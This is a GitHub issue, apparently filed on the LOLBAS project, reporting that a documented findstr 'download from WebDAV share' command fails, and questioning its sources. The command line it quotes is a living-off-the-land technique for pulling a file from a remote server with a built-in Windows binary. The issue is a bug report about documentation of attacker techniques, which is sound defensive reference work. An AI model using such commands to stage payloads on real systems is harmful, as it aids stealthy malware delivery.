You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I tried executing findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe as explained in yml/OSBinaries/Findstr.yml but I am getting FINDSTR: Cannot open \\<Redacted>\calc.exe
I have made sure the webdav server is working and accessible on port 80, I can download the file calc.exe from the webdav server using curl, wget or a web browser.
I checked the resources mentioned in yml/OSBinaries/Findstr.yml and couldn't find any mention of findstr.exe being used for downloading.
The text was updated successfully, but these errors were encountered:
I tried executing
findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe
as explained inyml/OSBinaries/Findstr.yml
but I am gettingFINDSTR: Cannot open \\<Redacted>\calc.exe
I have made sure the webdav server is working and accessible on port 80, I can download the file
calc.exe
from the webdav server using curl, wget or a web browser.I checked the resources mentioned in
yml/OSBinaries/Findstr.yml
and couldn't find any mention of findstr.exe being used for downloading.The text was updated successfully, but these errors were encountered: